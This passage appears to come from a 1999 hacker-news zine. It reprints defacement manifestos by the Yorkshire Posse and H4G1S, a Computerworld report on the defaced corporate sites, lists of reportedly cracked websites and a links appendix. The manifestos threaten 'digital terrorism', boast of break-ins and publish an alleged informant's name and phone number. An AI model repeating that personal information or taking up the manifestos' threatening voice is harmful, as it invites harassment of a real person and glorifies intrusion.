attributed by the press to a 3 year investigation by the RCMP/FBI. Nothing could
be further by the t ruth. In actual truth, this arrest was the result of hearsay coming
from a 20 year old paid informant by the name of Nick Potkay (whose phone #
incidentally is: (203) 746-0734). It's nice that the FBI can make arrests in Canada
based upon the word of a socially inept kid such as Nicholas Potkay isn't it?
This is your wake up call, we are making a declaration of war against all who
would challenge the freedom of Canadians with such ludicrous actions! We have
broken into your phone companies, your breweries; everything you hold sacred!
And we will contin ue to defile corporate Canadian privacy until the bullshit
agendas of the Yanks are cast aside and realized for what they are!
Let us examine for just a moment the bullshit tactics of NASA:
The hack done at Nasa was merely a change to ONE file in the html directory,
index.html and NASA claims it took over 200 man hours for them to correct this
situation. Are we to believe that it takes 200 hours for a team of NASA employees
to reinstall one computer and re-install the contents of that box from tape backup?
These numbers are totally arbitrary. If these numbers are accurate, then it is not
so difficult to imagine how a tragedy such as the Challenger explosion could
occur!
Your friendly neighbourhood "rocket scientists" at NASA are obviously fabricating
these numbers in order to get the FBI to pursue Jason Mewhiney. Seventy-four
thousand dollars to issue a couple of commands and replace the altered page?
The calculators at NASA must have the zero key stuck or something. Seventy-four
dollars perhaps, but seventy-four thousand? The painful reality is this:Jason is
obviously a scapegoat for NASA's inability to secure their so called "critical" web
site.
And Brother Micherob elucidates:
th3 fb1 4nd rcMp, al0ng w1th n4s4, kl41m th4t a k1d wh0 all3g3dly (ev1d3nc3 1z
3xtr3m3ly w34k) br0k3 1nt0 www.nasa.gov & ch4ng3d th31r w3bp4g3, h4z
s0meh0w kAuz3d $70,000 w0rth 0f d4m4g3 & 200 h0urz 0f l0st m4n-t1m3 (t0
r3-1nst4ll a d1g1t4l un1x m4ch1n3) .
pAus3 f()r a s3k0nd & l3tZ k0ns1d3r th1s.. n4s4 h4z 1n t0t4l 100z 0f th0u$4ndz 0f
m4ch1n3zZ. 1ph th1z kl41m 0f 200 h0Urz 0f m4n t1m3 1z 3v3n r3m0t3lY
r34l1$t1k, th1z w0Uld m34n n4sa h4z b33n 1nst4ll1ng b0x3z s1nc3 th3 1c3 4g3.
l3tz ex4m1n3 th1Z sUm 0f $70,000.. 1n 0rd3r t0 r3st0r3 th3 p4g3, n4s4 d1d:
# mv index.html.bak index.html
(1t wUz b4ck3d uP by th3 'm4l1c10us 4nd 3v1l h4ck3r-tYp3' wh0 d1d 1t) 1ph th4t
c0st $70,000 1t'z n0 w0nd3r th3 U.S. d3f1c1t 1z s0 hUg3.m4yb3 th3y sh0Uld
ex4m1n3 th31r 3xp3nd1tUr3z 4 l1ttl3 m0r3 cl0Z3ly.. sUm1 sh0uld a$k th3m h0w
mUch 1t k0zT u.s. t4xyp4y 3rz t0 flY RCMP p30pl3 d0wn, h4v3 th3m st4Y 1n
h0t3lz & att3nd s3m1n4rz, h0w mUch th1$ tr14l 1z c0st1ng t0 b0th am3r1c4nz &
k4n4d1aNz, 3tc., 3tc.. th3n s1t b4k & w4tch th3m 4tt3mpt t0 jU$t1fY th1s c1rcU$.
Finally, some parting words from Brother Mandabarb:
And so we come to an end of our diatribe. I hope you have enjoyed our spectacle.
Remember -- in the future, question what your read. But most of all, phear -- For
the Yorkshire Posse hath arrived.
The original site that got hacked had these words on it: (NASA. 1998)
(H4G1S > NASA)
Gr33t1ngs fr0m th3 m3mb3rs 0f H4G1S.
Our mission is to continue where our colleagues the ILF left off. During the next month, we the members of H4G1S, will be launching an attack on corporate
America. All who profit from the misuse of the internet will fall victim to our upcoming reign of digital terrorism.
Our privileged and highly skilled members will stop at nothing until our presence is felt nationwide.
Even your most sophisticated firewalls are useless. We will demonstrate this in the upcoming weeks.
THE COMMERCIALIZATION OF THE INTERNET STOPS HERE
KEVIN MITNICK IS CURRENTLY IMPRISONED FOR NOTHING MORE THEN HIS CURIOUSITY AND DESIRE TO LEARN. KEVIN HAS BEEN
ROTTING IN A PRISON CELL FOR 2 YEARS AND STILL HASN'T GONE TO TRIAL.
ED CUMMINGS WAS THROWN IN PRISON FOR POSSESSING NOTHING OTHER THAN A COUPLE PIECES OF ELECTRONICS FROM
RADIO SHACK. HIS COUNTRY DESTROYED HIS LIFE. WHILE IN PRISON CUMMINGS WAS SUBJECTED TO POOR PRISON CONDITIONS
AND TREATED AS IF HE WERE A MURDERER.
The injustice doesn't just end with Kevin Mitnick, there are others who have been targets of the government. Ed Cummings (aka BernieS) went to Prison for
possessing a timing crystal (used in various el ectronic devices and can be purchased at Radio Shack) along with a Tone Dialer (also obtainable at Radio Shack). If
you put these two things together in the right way, it is possible to use this device to trick the phone company into believing that you inserted a quarter into a
payphone. Mr. Cummings never had these parts combined, and therefore never commited any crime. But NO, the government said he commited a crime, and what
happens? He goes to prison because they say so. It wasn't hard to see th at things were going wrong for Mr. Cummings. A person being charged with man slaughter
got bail set substantially lower then Mr. Cummings. Is itjust me or does that sound ridiculous?
You can blame us
Make every attempt to detain us
You can make laws for us to break
And "secure" your data for us to take
A hacker, not by trade, but by BIRTHRIGHT.
Some are born White, Some are born Black
But the chaos chooses no c olor
The chaos that encompasses our lives, all of our lives
Driving us to HACK
Deep inside, past the media, past the government, past ALL THE BULLSHIT:
WE ARE ALL HACKERS
Once it has you it never lets go.
The conspiracy that saps our freedom, our humanity, our stability and security
The self-propagating fruitless cycle that can only end by force
If we must end this ourselves, we will stop at nothing
This is a cry to America to GET IN TOUCH with the hacker inside YOU
Take a step back and look around
How much longer must my brothers suffer, for crimes subjectively declared ILLEGAL.
All these fucking inbreds in office
Stealing money from the coun try
Writing bills to reduce your rights
As the country just overlooks it
PEOPLE OF AMERICA:
IT'S TIME TO FIGHT.
And FIGHT we WILL
In the streets and from our homes
In cyberspace and through the phones
They are winning, by crushing our will
Through this farce we call the media
Through this farce we call capitalism
Through this farce we call the JUSTICE SYSTEM
Tell BernieS and Kevin Mitnick about Justice
This is one strike, in what will soon become *MANY*
For those of you at home, now, reading this, we ask you
Please, not for Hagis, Not for your country, but for YOURSELF
FIGHT THE WHITE DOG OPRESSOR
Amen.
http://www.computerworld.com/home/news.nsf/CWFlash/9904062hacker
Canadian hackers attack 13 major corporate sites
By Tom Diederich
Several major corporate Web sites apparently were hacked into last Sunday
evening by a group called the Yorkshire Posse.
The group said 13 companies were targeted to protest the arrest last April
of Canadian Jason Mewhiney, who is suspected of breaking into a NASA Web
site and causing tens of thousands of dollars in damage.
"I think they went for us because we were a high-profile site," said Sara
Winge, a spokeswoman for information technology publisher O'Reilly &
Associates Inc. in Sebastopol, Calif., one of the sites that was hit.
"They were trying to get a message across about a Canadian hacker -- or
cracker, I guess I should say -- who was being tried for computer crimes.
But it didn't have anything to do with O'Reilly as a company."
The hacked sites were replaced with a page that proclaimed a "declaration
of war against all who would challenge the freedom of Canadians with such
ludicrous actions!"
The group claimed to have also hit Playboy.com, Sonymusic.com and a Sun
Microsystems Inc. customer support site in Canada. Officials from those
companies weren't available for comment at press time.
Winge said O'Reilly was contacting the other 12 sites to learn how the
attacks were carried out. "We obviously can't give a lot of detail, but we
have prevented it from reoccurring at this point," she said.
"All of our electronic-commerce offerings are on another server, which was
not at all touched and has much heavier security," Winge added.
She said the attack occurred late Sunday night and was fixed by 9 a.m.
Monday morning.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
""
April 5th
Rumoured cracked:
<a href="www.deejay.it">www.deejay.it</a> (from irc)
April 6th
Cracked (HNN Rumours section)
Here are the reported cracks for today
<a href="http://www.cnmaiz.com.mx/">http://www.cnmaiz.com.mx/</a>
<a href="http://www.weidenmiller.com">http://www.weidenmiller.com</a>
<a href="http://www.windowsplanet.com">http://www.windowsplanet.com</a>
<a href="http://www.cruzroja.org.mx">http://www.cruzroja.org.mx</a>
<a href="http://www.oceanica.com.mx">http://www.oceanica.com.mx</a>
<a href="http://www.carnaval.com.mx">http://www.carnaval.com.mx</a>
<a href="http://www.alarmax.com.mx">http://www.alarmax.com.mx</a>
<a href="http://www.mazcity.com.mx">http://www.mazcity.com.mx</a>
<a href="http://www.exxor.com.mx">http://www.exxor.com.mx</a>
<a href="http://www.bandaelrecodo.com.mx">http://www.bandaelrecodo.com.mx</a>
<a href="http://www.ibalpe.com.mx">http://www.ibalpe.com.mx</a>
<a href="http://www.haciendadelmar.com.mx">http://www.haciendadelmar.com.mx</a>
<a href="http://www.lasflores.com.mx">http://www.lasflores.com.mx</a>
<a href="http://www.grupotecnica.com.mx">http://www.grupotecnica.com.mx</a>
<a href="http://www.mazatlangolfking.com.mx">http://www.mazatlangolfking.com.mx</a>
April 7th
contributed by Anonymous (HNN rumours section)
Cracked
The following sites have been reported as cracked:
<a href="http://www.wrestlingtitan.com/">http://www.wrestlingtitan.com/</a>
<a href="http://www.redmanfamily.net">http://www.redmanfamily.net</a>
<a href="http://www.china.com/">http://www.china.com</a>
<a href="http://www.zavallis.com/">http://www.zavallis.com/</a>
<a href="http://www.mxcert.org.mx">http://www.mxcert.org.mx</a>
<a href="http://www.affiliatedrecords.com/">http://www.affiliatedrecords.com/</a>
<a href="http://www.egallery.com/">http://www.egallery.com/</a>
<a href="http://www.zapnow.com/">http://www.zapnow.com/</a>
<a href="http://www.thecaboose.com/">http://www.thecaboose.com</a>
<a href="http://www.linux.org.mx/">http://www.linux.org.mx</a>
April 8th
Contributed by Anonymous (HNN rumours section)
Cracked
<a href="http://www.fibredust.com">http://www.fibredust.com</a>
<a href="http://www.tentex.com">http://www.tentex.com</a>
April 9th
http://www.e-dreamshop.com
@HWA
_________________________________________________________________________
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
Mirror sites:
~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/ <a href="http://bewoner.dma.be/cum/">Go there</a>
Brasil........: http://www.psynet.net/ka0z <a href="http://www.psynet.net/ka0z/">Go there</a>
http://www.elementais.cjb.net <a href="http://www.elementais.cjb.net/">Go there</a>
Columbia......: http://www.cascabel.8m.com <a href="http://www.cascabel.8m.com/">Go there</a>
http://www.intrusos.cjb.net <a href="http://www.intrusos.cjb.net">Go there</a>
Indonesia.....: http://www.k-elektronik.org/index2.html <a href="http://www.k-elektronik.org/index2.html">Go there</a>
http://members.xoom.com/neblonica/ <a href="http://members.xoom.com/neblonica/">Go there</a>
http://hackerlink.or.id/ <a href="http://hackerlink.or.id/">Go there</a>
Netherlands...: http://security.pine.nl/ <a href="http://security.pine.nl/">Go there</a>
Russia........: http://www.tsu.ru/~eugene/ <a href="http://www.tsu.ru/~eugene/">Go there</a>
Singapore.....: http://www.icepoint.com <a href="http://www.icepoint.com">Go there</a>
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
� 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]